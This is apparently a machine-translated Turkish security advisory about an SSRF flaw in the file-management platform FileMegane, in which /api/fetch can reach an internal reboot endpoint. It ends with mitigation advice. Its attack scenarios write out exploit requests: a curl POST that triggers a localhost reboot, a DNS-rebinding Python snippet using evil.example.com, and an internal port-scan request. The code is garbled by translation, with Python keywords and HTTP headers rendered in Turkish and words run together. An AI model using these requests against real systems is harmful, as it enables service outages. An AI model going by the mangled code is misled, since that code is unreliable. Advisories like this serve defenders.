FileMegane'deki Kritik SSRF Güvenlik Açığı Hizmet Kesintisine Yol Açıyor
Yayın Tarihi: 17 Şubat 2025 | Temel Puan: 7.2 YÜKSEK
Genel bakış
Yaygın olarak kullanılan bir dosya yönetim platformu olan FileMegane'de kritik bir Sunucu Tarafı İstek Sahteciliği (SSRF) güvenlik açığı (CVE-2025-20075) tespit edildi. Etkilenen sürümler arasında 3.0.0.0 ile 3.3.9.9 arasında yer alan sürümler, saldırganların güvenli olmayan arka uç Web API isteklerini istismar ederek yetkisiz hizmet yeniden başlatmalarını tetiklemelerine olanak sağlıyor. Bu kusur, sistem kullanılabilirliği ve bütünlüğü için önemli riskler oluşturuyor.
Teknik Analiz
Güvenlik Açığı Türü : SSRF (CWE-918)
Etkilenen Bileşen : /api/fetch Harici dosyaları veya URL'leri almak için tasarlanmış FileMegane'deki uç nokta.
Kök Neden : Kullanıcı tarafından sağlanan URL'lerin yetersiz doğrulanması, saldırganların istekleri kimliği doğrulanmamış uç nokta da dahil olmak üzere dahili API'lere yönlendirmesine olanak tanır /internal/reboot .
Güvenlik açığı, uygulamanın url 'deki parametre aracılığıyla kötü amaçlı bir URL'yi işlemesi durumunda ortaya çıkar /api/fetch. Saldırganlar, dahili uç noktalara (örneğin, ) istekler gönderebilir http://127.0.0.1:8080/internal/rebootve sunucunun hizmet yeniden başlatma gibi istenmeyen eylemleri yürütmesini zorlayabilir.
Örnek Saldırı Senaryoları
Senaryo 1: Dahili API aracılığıyla Doğrudan Hizmet Yeniden Başlatma
Saldırı Kurulumu : Bir saldırgan,
/api/fetchuç noktanın keyfi URL getirilmesine izin verdiğini keşfeder.Exploit'in Oluşturulması :
curl -X POST 'http://kurban-sunucusu/api/fetch' \ -H 'İçerik Türü: uygulama/json' \ -d '{"url": "http://localhost:8080/dahili/yeniden-başlat"}'
Uygulamak :
FileMegane'in arka ucu isteği işler ve dahili yeniden başlatma API'sine bir POST gönderir.
Sunucu anında yeniden başlatılır, 5 dakikalık bir kesinti yaşanır ve kullanıcı işlemleri aksar.
Senaryo 2: IP Doğrulamasını Atlatmak İçin DNS Yeniden Bağlama
Saldırı Kurulumu : Saldırgan,
evil.example.commeşru bir harici IP ile arasında DNS çözümlemesini değiştiren bir etki alanı ( ) kaydeder127.0.0.1.Exploit Zinciri :
ithalat talepleri # İlk istek: İlk kontrolleri atlatmak için izin verilen harici IP'ye çözüm yanıtı = istekler . post ( 'http://victim-server/api/fetch' , json = { "url" : "http://evil.example.com/internal/reboot" } ) # DNS yeniden bağlama işlemi gerçekleşir; sonraki istekler 127.0.0.1'e çözümlenir
Etkisi : Arka uç sunucusu yeniden bağlama sonrasında yeniden başlatma uç noktasına erişir ve bu da tekrarlanan hizmet kesintilerine yol açar.
Senaryo 3: SSRF'yi Ağ Taramasıyla Zincirleme
Keşif : Saldırgan, dahili portları taramak için FileMegane'in SSRF'sini kullanır:
POST /api/fetch HTTP/1.1 Ana Bilgisayar : kurban-sunucu İçerik Türü : uygulama/json { "url" : "http://192.168.1.1:8080/admin/durum" }
Keşif : Yeniden başlatma API'sini tanımlar
192.168.1.1:8080/internal/reboot.İstismar : Kritik altyapıyı yeniden başlatmak için hazırlanmış bir istek gönderir ve saldırıyı tam bir veri merkezi kesintisine dönüştürür.
Etki Analizi
Kullanılabilirlik : Hizmetin yeniden başlatılması, iş operasyonlarını etkileyen uzun süreli kesintilere neden olur.
Veri Kaybı : Ani yeniden başlatmalar kaydedilmemiş verileri bozabilir veya işlemleri kesintiye uğratabilir.
Yanal Hareket : SSRF iç sistemleri açığa çıkarabilir ve daha fazla istismara olanak tanıyabilir.
Azaltma Stratejileri
Hemen Yama Yapın : Sıkı URL doğrulamasını zorunlu kılan ve dahili IP aralıklarını engelleyen FileMegane v3.4.0.0 sürümüne yükseltin .
Giriş Dezenfeksiyonu :
Localhost'a, özel IP'lere veya ayrılmış etki alanlarına başvuran URL'leri reddedin.
İzin verilen alan adları için izin listelerini kullanın.
Ağ Güçlendirme :
Dahili API'leri güvenlik duvarlarının arkasına yerleştirin.
Hassas uç noktalar için kimlik doğrulamayı zorunlu kılın.
İzleme : Anormal dahili istek kalıpları (örneğin, API erişimini yeniden başlatma) konusunda uyarı.
Çözüm
CVE-2025-20075, modern uygulamalardaki SSRF güvenlik açıklarının tehlikelerini vurgular. FileMegane kullanan kuruluşlar, yamaları önceliklendirmeli ve riskleri azaltmak için derinlemesine savunma stratejileri benimsemelidir. Düzenli güvenlik denetimleri ve proaktif girdi doğrulaması, benzer istismarları önlemek için kritik öneme sahiptir.
Devam eden güncellemeler için FileMegane'in güvenlik uyarılarını ve MITRE CVE veritabanını izleyin .
Makale cyberhat.online, Siber Güvenlik Analisti tarafından yazılmıştır.